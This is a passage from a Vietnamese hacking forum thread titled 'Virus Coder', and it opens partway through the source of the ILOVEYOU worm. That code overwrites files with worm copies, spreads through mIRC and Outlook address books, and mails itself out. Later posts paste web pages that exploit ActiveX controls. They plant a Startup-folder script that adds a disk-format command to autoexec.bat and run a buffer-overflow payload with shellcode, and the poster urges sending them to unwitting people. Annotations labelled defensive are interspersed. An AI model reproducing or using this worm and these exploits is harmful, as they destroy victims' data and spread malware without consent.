dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct")
or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or
(s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.ini")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt,
if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run
correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2= /.dcc send $nick
"&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
' Recursive directory walk: for each sub-folder of folderspec, process its
' files with infectfiles() and then descend into it. The files directly in
' the starting folder itself are not passed to infectfiles() by this
' routine.
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
' Thin wrapper around WScript.Shell.RegWrite: writes regvalue to regkey
' with the default value type. A new shell object is created on every call.
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
' Thin wrapper around WScript.Shell.RegRead: returns the registry value
' named by `value`. No error handling is set up inside this function.
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
' Returns 0 when filespec exists and 1 when it does not - the opposite of
' what the name suggests. Callers in this listing compare against these
' inverted values, which has to be kept in mind when reading regruns().
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
' Intended as the folder counterpart of fileexist(). As listed it assigns
' its result to the name "fileexist" rather than "folderexist", and no call
' to it appears in the visible part of the script.
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
' Mail propagation through Outlook automation: for every MAPI address list,
' each entry that has no value yet under HKCU\Software\Microsoft\WAB\ gets
' one message with the fixed subject, body and attachment shown below, and
' is then recorded under that key so it is not mailed again. The entry
' count of each list is stored under the same key.
' Review note (defensive):
'   * Mail-side indicators in this listing: subject "ILOVEYOU", the body
'     sentence below and an attachment named LOVE-LETTER-FOR-YOU.TXT.vbs.
'     Gateway rules should key on the script attachment type, since subject
'     and name are trivially changed in variants.
'   * Host-side indicator: per-address DWORD values under
'     HKCU\Software\Microsoft\WAB\ show that this routine ran and list whom
'     it mailed, which helps with notification of recipients.
'   * The routine depends on scripts being able to drive the mail client
'     without user confirmation; prompting on programmatic send and address
'     book access closes that path.
sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,rega d
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
else
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="
các bác nghiên cứu nha các bác thử vào đây coi
các bác thử vào đây coi www.tbns.net/quynhkheonline/2.bat
[Question] Virus Coder |
12/12/2006 11:38:08 (+0700) | #13 | 29988 |
|
hack9x
Member
|
0 |
|
|
Joined: 11/12/2006 23:15:02
Messages: 20
Location: hà nội
Offline
|
|
cái lày có thể bỏ vào tranng web lè
<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
<!-- Review note (defensive): the page instantiates an ActiveX control by CLSID and
     the script that follows sets its Path to a file in the Startup folder and
     calls write(), i.e. the control is used to create a file on the visitor's
     disk that runs at the next logon. This CLSID is commonly documented as the
     scriptlet type-library control (TODO confirm against vendor documentation).
     Controls of this kind were never meant to be scripted by web pages; the
     period fixes were the vendor patch or a kill bit for the CLSID, and browser
     zone settings that refuse to script controls not marked safe. -->
<p>
<object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC">
</object>
</p>
<script>
var1='echo @format "c: < c.txt >nul" >> c:\\autoexec.bat';
scr.Reset();
scr.Path="C:\\windows\\Start Menu\\Programs\\StartUp\\repair.hta";
scr.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><script>wsh.Run('command /c echo e 171,20 >> C:\\d.TXT',true,1);wsh.Run('command /c echo e 181,20 >> C:\\d.TXT',true,1);wsh.Run('command /c echo w>> C:\\d.TXT',true,1);wsh.Run('command /c echo q >> C:\\d.TXT',true,1);wsh.Run('command /c echo y >> C:\\C.TXT',true,1);wsh.Run('command /c echo Sucker >> C:\\C.TXT',true,1);wsh.Run('command /c echo @echo Please wait while Setup updates your configuration files. >> c:\\autoexec.bat',true,1);wsh.Run('command /c echo @echo This may take a few minutes... >> c:\\autoexec.bat',true,1);wsh.Run('command /c "+var1+"',true,1);wsh.Run('command /c debug c:\\autoexec.bat < d.txt',true,1)</"+"SCRIPT>";scr.write();
</script>
<!-- Review note (defensive): second control loaded by CLSID. The script that
     follows builds a very long "/i ..." argument, appends raw byte values with
     Chr() and passes the result to InvokeRegWizard - the shape of an attempt to
     overflow a fixed-size buffer inside the control. The byte values include
     hard-coded addresses, so the page is tied to one specific system build.
     Mitigation is the same as for any unsafe control: vendor patch or kill bit
     for this CLSID, and not allowing untrusted pages to script ActiveX. -->
<p>
<object classid="clsid:50E5E3D1-C07E-11D0-B9FD-00A0249F6B00" id="RegWizObj">
</object>
</p>
<script language="VbScript">
expstr = "/i AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAA"
expstr = expstr & Chr(235)
expstr = expstr & Chr(53)
expstr = expstr & Chr(208)
expstr = expstr & Chr(127)
expstr = expstr + Chr(144)
expstr = expstr + Chr(139) + Chr(252)
expstr = expstr + Chr(131) + Chr(199) + Chr(25)
expstr = expstr + Chr(80)
expstr = expstr + Chr(87)
expstr = expstr + Chr(186) + Chr(96) + Chr(9) + Chr(250) + Chr(191)
expstr = expstr + Chr(255) + Chr(210)
expstr = expstr + Chr(51) + Chr(192)
expstr = expstr + Chr(80)
expstr = expstr + Chr(186) + Chr(202) + Chr(212) + Chr(248) + Chr(191)
expstr = expstr + Chr(255) + Chr(210)
expstr = expstr + "rundll32 shell32.dll,SHExitWindowsEx 1"
RegWizObj.InvokeRegWizard(expstr)
</script>
</html>
[Question] Virus Coder |
12/12/2006 11:47:20 (+0700) | #14 | 29994 |
|
hack9x
Member
|
0 |
|
|
Joined: 11/12/2006 23:15:02
Messages: 20
Location: hà nội
Offline
|
|
virus định giạngổ cứng
<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
<!-- Review note (defensive): same page as in the previous post. The control
     loaded here by CLSID is driven by the following script to write a file into
     the Startup folder (Path + write()), so that it runs at the next logon.
     This CLSID is commonly documented as the scriptlet type-library control
     (TODO confirm against vendor documentation). Period mitigations: vendor
     patch or kill bit for the CLSID, and zone settings that refuse to script
     controls not marked safe. -->
<p>
<object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC">
</object>
</p>
<script>
var1='echo @format "c: < c.txt >nul" >> c:\\autoexec.bat';
scr.Reset();
scr.Path="C:\\windows\\Start Menu\\Programs\\StartUp\\repair.hta";
scr.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><script>wsh.Run('command /c echo e 171,20 >> C:\\d.TXT',true,1);wsh.Run('command /c echo e 181,20 >> C:\\d.TXT',true,1);wsh.Run('command /c echo w>> C:\\d.TXT',true,1);wsh.Run('command /c echo q >> C:\\d.TXT',true,1);wsh.Run('command /c echo y >> C:\\C.TXT',true,1);wsh.Run('command /c echo Sucker >> C:\\C.TXT',true,1);wsh.Run('command /c echo @echo Please wait while Setup updates your configuration files. >> c:\\autoexec.bat',true,1);wsh.Run('command /c echo @echo This may take a few minutes... >> c:\\autoexec.bat',true,1);wsh.Run('command /c "+var1+"',true,1);wsh.Run('command /c debug c:\\autoexec.bat < d.txt',true,1)</"+"SCRIPT>";scr.write();
</script>
<!-- Review note (defensive): the following script passes an over-long "/i ..."
     argument with appended raw bytes to this control's InvokeRegWizard method,
     which has the shape of a buffer-overflow attempt against the control. The
     hard-coded addresses in those bytes tie it to one specific system build.
     Mitigation: vendor patch or kill bit for this CLSID, and not allowing
     untrusted pages to script ActiveX controls. -->
<p>
<object classid="clsid:50E5E3D1-C07E-11D0-B9FD-00A0249F6B00" id="RegWizObj">
</object>
</p>
<script language="VbScript">
expstr = "/i AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAA"
expstr = expstr & Chr(235)
expstr = expstr & Chr(53)
expstr = expstr & Chr(208)
expstr = expstr & Chr(127)
expstr = expstr + Chr(144)
expstr = expstr + Chr(139) + Chr(252)
expstr = expstr + Chr(131) + Chr(199) + Chr(25)
expstr = expstr + Chr(80)
expstr = expstr + Chr(87)
expstr = expstr + Chr(186) + Chr(96) + Chr(9) + Chr(250) + Chr(191)
expstr = expstr + Chr(255) + Chr(210)
expstr = expstr + Chr(51) + Chr(192)
expstr = expstr + Chr(80)
expstr = expstr + Chr(186) + Chr(202) + Chr(212) + Chr(248) + Chr(191)
expstr = expstr + Chr(255) + Chr(210)
expstr = expstr + "rundll32 shell32.dll,SHExitWindowsEx 1"
RegWizObj.InvokeRegWizard(expstr)
</script>
</html>
ác bạn hãy đưa nó vào mã nguồn của trang web và goiử nó đi cho một người nào đó thử nghiệm coi hay lắm |
[Question] Virus Coder |
12/12/2006 11:49:38 (+0700) | #15 | 29995 |
|
hack9x
Member
|
0 |
|
|
Joined: 11/12/2006 23:15:02
Messages: 20
Location: hà nội
Offline
|
|
một đoạn mã nhỏ đưa vào html có thể khiển đối phương chjết không kịp ngáp
<!-- Review note (defensive): minimal page that asks the browser's VBScript engine
     to create the Windows Script Host shell object and start a local program
     (here Notepad). Whether this succeeds depends on the security zone the page
     is rendered in: it presumably needs a zone that allows creating and
     scripting ActiveX objects not marked safe (local files, HTAs, or a zone
     that has been loosened) - TODO confirm for the browser version in question.
     The defensive point is the general one: a page that can create this object
     can run any local command with the user's rights, so that zone setting must
     stay disabled for untrusted content. -->
<html>
<head>
<title>L0ng3ta</title>
</head>
<body >
<p>chuong trinh notepad se thuc thi
<script language=VBSCRIPT>
' Errors are suppressed, so a blocked CreateObject fails silently.
On Error Resume Next
Set WSHShell = CreateObject("WScript.Shell")
' Window style 1 (normal), do not wait for the program to exit.
WSHShell.Run "c:\windows\notepad.exe",1,False
</SCRIPT></p>
</body>
</html>
[Question] Virus Coder |
26/02/2007 04:30:59 (+0700) | #16 | 43118 |
format
Member
|
0 |
|
|
Joined: 29/06/2006 22:08:58
Messages: 29
Offline
|
|
ôi trời
kiếm lại được bài này mừng quá
trước đây bị NAV nó xóa đến hôm nay mới tìm lại được |
[Question] Virus Coder |
02/03/2007 03:41:12 (+0700) | #17 | 43970 |
|
delua
Locked
|
0 |
|
|
Joined: 28/12/2006 00:48:39
Messages: 102
Offline
|
|
Đâu dễ xơi như thế mấy bồ ! |
[Question] Virus Coder |
04/03/2007 04:28:08 (+0700) | #18 | 44367 |
|
hack9x
Member
|
0 |
|
|
Joined: 11/12/2006 23:15:02
Messages: 20
Location: hà nội
Offline
|
|
sao lại dễ sơi hả mà là sơi ngon đó sơi đi còn gì |
[Question] Virus Coder |
04/03/2007 08:01:36 (+0700) | #19 | 44419 |
|
delua
Locked
|
0 |
|
|
Joined: 28/12/2006 00:48:39
Messages: 102
Offline
|
|
Virus thời tiền sử thế này thì chỉ cần save as là anti túm cổ ngay lập tức !!!
Có lẽ bạn nên test trước !
[Question] Re: Virus Coder |
20/07/2008 01:33:11 (+0700) | #20 | 142343 |
hackingvietnam
Member
|
0 |
|
|
Joined: 18/07/2008 14:23:00
Messages: 26
Location: ..netlux..org..
Offline
|
|
Hic minh ghé qua chủ đề nóng bỏng này và thật rất có tình cảm vối các anh em trong diễn đàn, .....
Có hôm em đọc báo, và thông tin nhận được là có công cụ của nước ngoài ghi ra CD rồi tung ra thị trường, nhất là ở TP HCM lớn của cả nước; chính điều đó mà trong thời gian gần đây ngập tràn virus Việt, nhất là trojan, thật là buồn. Riêng mình có ý kiến thì khi mình sáng tạo nên sáng tạo cái hay chứ đừng cái dở là được; được như các anh đó mà viết phần mềm diệt virus thì tự hào thay cho Việt Nam ta..... không bàn luận gì thêm....
Nay mình muốn xin thông tin về cách tạo chương trình anti với mã nguồn chương trình anti calam mã nguồn mở. Chân thành cảm ơn mọi người! |